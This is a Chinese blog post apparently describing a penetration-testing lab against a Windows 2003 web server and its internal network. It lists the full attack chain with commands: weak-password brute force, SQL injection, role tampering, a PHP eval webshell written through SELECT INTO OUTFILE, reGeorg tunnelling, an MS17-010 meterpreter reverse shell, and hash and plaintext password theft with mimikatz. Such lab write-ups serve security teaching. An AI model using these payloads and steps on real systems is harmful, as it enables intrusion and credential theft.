• 一次内网渗透详细过程


    前言

    目标:给出一个目标机ip,得到该服务器权限,并通过该ip渗透至内网控制内网的两台服务器

    攻击机:kali  (192.168.31.51)

    目标机:windows 2003  (192.168.31.196)

    1.暴力破解

    在前台“会员登陆”发现用户的账号

    使用burpsuite爆破出弱口令密码

    成功登陆用户界面

    2.SQL注入

    在网站首页发现SQL注入点

    使用sqlmap工具获得管理员账号和密码

    3.越权添加网站后台超管

     进入kefu管理员后台,发现是普通管理员权限,很多操作受限制

    通过抓包发现可以修改权限,将submanage”修改为“manage”,然后放包

    成功将“普通管理员”权限修改为“超级管理员”,然后再抓包发现“包”中的权限还是“submanage,继续修改为“manage

    修改成功,【在这个网站中,普通管理员想要操作不受限制,没次操作都可抓包修改为manage”,所以在这里我利用此漏洞直接添加一个超管,便于操作】

    成功登陆我刚新建的超管let

    4.getshell

    通过ip访问此网站,发现该网站存在“探针”,可以查看到当前网站目录

    通过sql注入出的管理员账户密码,登陆“data”管理员后台,发现此管理员有执行sql语句的权限,利用数据库命令,将“php一句话”写入到网站根目录下

    例如:select "<?php eval($_POST['pass']);?>" into outfile "C:/UPUPW_AP5.2/htdocs/wlt.php"

     

     成功用“菜刀”连接网站后台

     

    5.添加系统账户【超管】

     上传一个php大马”

     

    利用“大马”执行命令,创建系统超管账户

     

    扫描发现3389端口开启,远程连接到系统

     

    6.隧道代理-端口转发

    开启reGeorg监听:python reGeorgSocksProxy.py -p 9527 -u http://192.168.31.196/tunnel.php

     

    使用proxychains工具

     

    设置代理,先vi /etc/proxychains.conf编辑,再将第二行命令运行【复制相关文件,需要调用】,最后添加firefoxnmap等用到的工具

     

    取消图中的注释

     

    添加通道5,代理监听的端口,例如9527

     

    使用nmap工具查询开放的端口

     

    通过用户想要使用的应用程序运行ProxyChains,例如,启动msfconsole  

    执行命令proxychains msfconsole

     

    如下图所示,输入命令执行脚本便可连接到目标主机

    1set payload windows/x64/meterpreter/reverse_tcp

    或者set payload windows/meterpreter/reverse_tcp //针对目标机器使用的系统版本,目标机器32位就使用32

    2set LHOST 本机IP

    3use exploit/windows/smb/ms17_010_psexec脚本

    4set RHOST 目标IP

    5run

    如下图所示,表示成功连接到了目标主机,可输入相应的命令来达到目的

     

    代理获取系统账户和密码

    获取加密密码

    例如输入命令:run post/windows/gather/smart_hashdump,可以获取目标主机的账户和密码

     

    获取明文密码

    利用mimikatz获取明文密码,命令如下【我只用了两条命令】:

    meterpreter > load mimikatz  #加载mimikatz

    meterpreter > msv #获取hash

    meterpreter > kerberos #获取明文

    meterpreter >ssp   #获取明文信息

    meterpreter > wdigest #获取系统账户信息

    meterpreter >mimikatz_command -f a::   #必须要以错误的模块来让正确的模块显示

    meterpreter >mimikatz_command -f hash::   #获取目标 hash

    meterpreter > mimikatz_command -f samdump::hashes

    meterpreter > mimikatz_command -f sekurlsa::searchPasswords

     

    开启3389端口

    run getgui -e命令开启3389端口

    远程连接

    使用远程连接,连接目标主机:proxychains rdesktop 192.168.238.129proxychains rdesktop 192.168.238.130

     

     

  • 相关阅读:
    util包的常用类及其方法(下)
    util包的常用类及其方法(上)
    每日一记--java基础01
    每日一记--java细节之问01
    每日一记--设计模式01
    每日一记--JVM虚拟机01
    每日一记--java基础之final/static/事务
    每日一记--Mysql错误代码1067
    每日一记--AOP
    每日一记--代理模式
  • 原文地址:https://www.cnblogs.com/guaishoujingling/p/10966865.html
Copyright © 2020-2023  润新知